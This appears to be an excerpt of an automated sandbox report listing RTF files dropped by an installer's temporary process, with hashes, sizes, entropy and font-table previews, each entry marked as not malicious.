                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):64658
                                                                                                                                                                                                                                                          Entropy (8bit):4.992463300868246
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFke4jXLHT2njX8x3TLjwUtqYepAkVZEdvI9voCgsKBd79zqfAx4thgC4jFBo73:qqYGoCgkQ8FIA9r
                                                                                                                                                                                                                                                          MD5:79EAEF5F915091EA8A19A2D69C8312D9
                                                                                                                                                                                                                                                          SHA1:E91E254C7772330094955B8F32835A703BD9483C
                                                                                                                                                                                                                                                          SHA-256:D992C215B1031E0EB2BDF2262505BC1FA9E4C7DB122E31A0F63587C98427FFDD
                                                                                                                                                                                                                                                          SHA-512:BE93BC4A17261703097AFB8F3044F4C0D0BEA076EFD694F7A166CF843BD143B951041FFF54F3A1D60869EA4DAA7EBC3E35D56C25BE991D218403A7D0B9B2C0AD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\pano
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41056
                                                                                                                                                                                                                                                          Entropy (8bit):5.04631924061467
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:BX9xd/KzuwlRIbQhOsWx1LCrLXI1nc9xi79Jd3z/ijPmhaohJZ/6A9h:BjsKuuIA9h
                                                                                                                                                                                                                                                          MD5:84DEF6EB0D41C6B208DC679FBF4AAF91
                                                                                                                                                                                                                                                          SHA1:4B6E6116E8EA25B37EF6DD43BB8062805E58A099
                                                                                                                                                                                                                                                          SHA-256:22A596F719A6208B8EB3BF93A1025BBB9C92F31F5E3E6E37995AB58B4514B083
                                                                                                                                                                                                                                                          SHA-512:A831344C2D1ED8E2E5339A890A6E2F96160333D90AB1469D0F20C0BF3034068AECCEF609443405E807E01F074B4E4D9CF3BD7A319B2B30FF10727D3644576453
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f297\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial CYR;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 020405030504060
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43674
                                                                                                                                                                                                                                                          Entropy (8bit):5.051136691912746
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Bwq6xdo1SeUGLicPI0QhhiLVptabQhOsWx2s2x7yjxsqoLq2IDSssDSsaD0iHw8V:BErUneKsyIA90
                                                                                                                                                                                                                                                          MD5:03D5DC91896BD88D15D82608B85FA10A
                                                                                                                                                                                                                                                          SHA1:741A620D22C4A157211C2972E53AF6C402E00036
                                                                                                                                                                                                                                                          SHA-256:0EB740A746A33237558E99DA3599DE9DE975F7CE6C8988CE3E602C89E130BCFD
                                                                                                                                                                                                                                                          SHA-512:5C211CC5A33A7590C5ECF2BCBE479A0EE1AD56CA300D136A752F6BF26CEEC2643825EDC3896550E21C436DB2B76AB895818BF4C9B3EF12E3E481374E322E37EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43859
                                                                                                                                                                                                                                                          Entropy (8bit):5.052664414201202
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Bwqtxdo1SeUGLicPI0QhhiLVptabQhOsWx2G+xnd9MfUcL2L5Mc5255cRHjVlPw2:BvrUneKGsIA9B
                                                                                                                                                                                                                                                          MD5:F7320542A3AFF0FC824E6C8D5CA74FBC
                                                                                                                                                                                                                                                          SHA1:F3C273969AC71FB411A5677D23898B7FE0633BFF
                                                                                                                                                                                                                                                          SHA-256:FAAAACD62FDB8F2901ACD5D39CB2D54B9A728B463900AE08916DE586EE9CD521
                                                                                                                                                                                                                                                          SHA-512:8CD8ED594846968FD2932A0E396E4DD1833EC10C4CF4F187C80BE34378E55605AC190EE87A1A47AB335BF19764640FEC14F4A9CE7C5893877EAA995FADBC18BA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36262
                                                                                                                                                                                                                                                          Entropy (8bit):5.030821265978035
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4OkUx1ETicPI0QhhiLV/gKsmWgFdMXZ/6A9z:q44VUnSIA9z
                                                                                                                                                                                                                                                          MD5:61D796543650EBE8C4A143DCAFAE4D24
                                                                                                                                                                                                                                                          SHA1:54CD649E28D6442AA3946EE9891A156A68A3B2CB
                                                                                                                                                                                                                                                          SHA-256:585B560159CC4BDB9361F30B002CE9AA44AD510FB30A61257076810146B2D918
                                                                                                                                                                                                                                                          SHA-512:201BFB392E79FBC5A62A63610CD19B009ED98C54D5DF34B86C696C757175CD1DB3650B0CE0938C5C3529BD155C9E63E158D153588C723A1F968BDDBF05017A68
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdb
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43450
                                                                                                                                                                                                                                                          Entropy (8bit):5.051452976930654
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Bwqtxdo1SeUGLicPI0QhhiLVptabQhOsWx2DKxwaOqBdLE0aWsaeyXH62lGFcaZl:BvrUneKD/IA9B
                                                                                                                                                                                                                                                          MD5:843D629B19FC6C1C760CCCF79DCD8778
                                                                                                                                                                                                                                                          SHA1:E1FD65A3F296C7F966AD9A3CA7C6C970127FCC04
                                                                                                                                                                                                                                                          SHA-256:369458B9EAD9880E66B906332948AE38AEB74173BB24FEFD65B18438FECFCD23
                                                                                                                                                                                                                                                          SHA-512:0C3E239B14888868A2F5FB95A7446E22460819B6DE4C2AE8C23C1E31C25D4FC4B9A04D861ED516A975A8397DB621BA517AB29606FBEAFBD70E7A6131D2604D58
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):68188
                                                                                                                                                                                                                                                          Entropy (8bit):5.031260319156822
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4eox1edVW3C79k5haj5g5V5V5h5G5P5N5R5gVVhGPN8turfTYlDSsGx7TYlD+sE:q4N18T22yAwfv1vfvZ9I+kXrPtIA9D
                                                                                                                                                                                                                                                          MD5:FAC5492A79C913CDD25F21166FB2CBDC
                                                                                                                                                                                                                                                          SHA1:F989F1D0D67D3B121AD1B4A491FE81CC6D1C55D2
                                                                                                                                                                                                                                                          SHA-256:5C9D5955EB4E98A177EDA4E4B39BF09E19E3D6B83E634CA5C72CEFBDB8FE7178
                                                                                                                                                                                                                                                          SHA-512:A715FC343E1183806AA428EDF040B6964EEA8492751C6453293729874A77F43867246813625D4C0D62ACBD00DC0BDE267EBF1285B3A96C0C5D5B4C9F0BF5CF7D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):52996
                                                                                                                                                                                                                                                          Entropy (8bit):5.037460927420348
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Bk31e0/Yzc00QfHyUCp5N7G5V5V5h5G5P5N5TRrbGY+FNSdE2CUuHctO9P0CS0t0:BV0kIA9I
                                                                                                                                                                                                                                                          MD5:77A17A8F48C96F611F14429D732C1F73
                                                                                                                                                                                                                                                          SHA1:FE3F09AF1390F0C2F780A172450B3CCF54A09CD0
                                                                                                                                                                                                                                                          SHA-256:F2B98A3175FC09320625C396606DA5058A192A5AF54A0C61D491E5FCB7EC96C4
                                                                                                                                                                                                                                                          SHA-512:3A3AE1E13D1E24081A3913B34638DA25DC2FF39BBFB3151464B0E330828D9A3E3AB876E546E90C11E858FF1611F02686874D1106AF59A79F6399EC5DA7F60C26
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \from
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41056
                                                                                                                                                                                                                                                          Entropy (8bit):5.04631924061467
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:BX9xd/KzuwlRIbQhOsWx1LCrLXI1nc9xi79Jd3z/ijPmhaohJZ/6A9h:BjsKuuIA9h
                                                                                                                                                                                                                                                          MD5:84DEF6EB0D41C6B208DC679FBF4AAF91
                                                                                                                                                                                                                                                          SHA1:4B6E6116E8EA25B37EF6DD43BB8062805E58A099
                                                                                                                                                                                                                                                          SHA-256:22A596F719A6208B8EB3BF93A1025BBB9C92F31F5E3E6E37995AB58B4514B083
                                                                                                                                                                                                                                                          SHA-512:A831344C2D1ED8E2E5339A890A6E2F96160333D90AB1469D0F20C0BF3034068AECCEF609443405E807E01F074B4E4D9CF3BD7A319B2B30FF10727D3644576453
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f297\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial CYR;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 020405030504060
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):49864
                                                                                                                                                                                                                                                          Entropy (8bit):5.043460580292076
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Bbi4jegzTJqNgVVhGPNXturfTYlDojU7FDSSmDP3QyYd9RhtAx/IFdNJf+v/AXQ0:BJkethIA9Q
                                                                                                                                                                                                                                                          MD5:C5AC9F8F23886CDA2348A3BC382F8F9B
                                                                                                                                                                                                                                                          SHA1:E18B97EA75873D424D0F0CDD349632CA3C96B656
                                                                                                                                                                                                                                                          SHA-256:EC49E0ED640B29CF852E455D9D0A7666914DC7114D771F514405944F6C8D3733
                                                                                                                                                                                                                                                          SHA-512:4A8FB239C01F8E1A163C6CB75C84884CADBAF0FA25159218D40F73F73A9255353134EA0D64800EAC40E49383085D5EFF05662B78FF43696A69A1FB591C80A7F1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang2145\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1031\deflangfe1031\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimino
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):53700
                                                                                                                                                                                                                                                          Entropy (8bit):4.980792929518482
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqOkbe0ULHT2njX8x3TLjwUtqYepAkVZEdvI9DfLBmKPKPqP/tPw8Ecnv7eJTEcc:qq0EfLBGIA9Jk
                                                                                                                                                                                                                                                          MD5:4F112D455797B724837B7714D54B6621
                                                                                                                                                                                                                                                          SHA1:20351467C091733C0E7F4848B7809D54112143FE
                                                                                                                                                                                                                                                          SHA-256:6ED5F0BC906B1E1A884CCF648C4D81FAD8B0B6D8A13F07BC90796811E6C13035
                                                                                                                                                                                                                                                          SHA-512:928762682FE7FFCB119E93C8AB228EBF62D63763230A2C43F76D9504DC9DB4BF85E0519C2E4245B20FAC038DC83DBDA82FDDB606FD9C7F4552CAA86B61904121
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):64658
                                                                                                                                                                                                                                                          Entropy (8bit):4.992463300868246
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFke4jXLHT2njX8x3TLjwUtqYepAkVZEdvI9voCgsKBd79zqfAx4thgC4jFBo73:qqYGoCgkQ8FIA9r
                                                                                                                                                                                                                                                          MD5:79EAEF5F915091EA8A19A2D69C8312D9
                                                                                                                                                                                                                                                          SHA1:E91E254C7772330094955B8F32835A703BD9483C
                                                                                                                                                                                                                                                          SHA-256:D992C215B1031E0EB2BDF2262505BC1FA9E4C7DB122E31A0F63587C98427FFDD
                                                                                                                                                                                                                                                          SHA-512:BE93BC4A17261703097AFB8F3044F4C0D0BEA076EFD694F7A166CF843BD143B951041FFF54F3A1D60869EA4DAA7EBC3E35D56C25BE991D218403A7D0B9B2C0AD
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
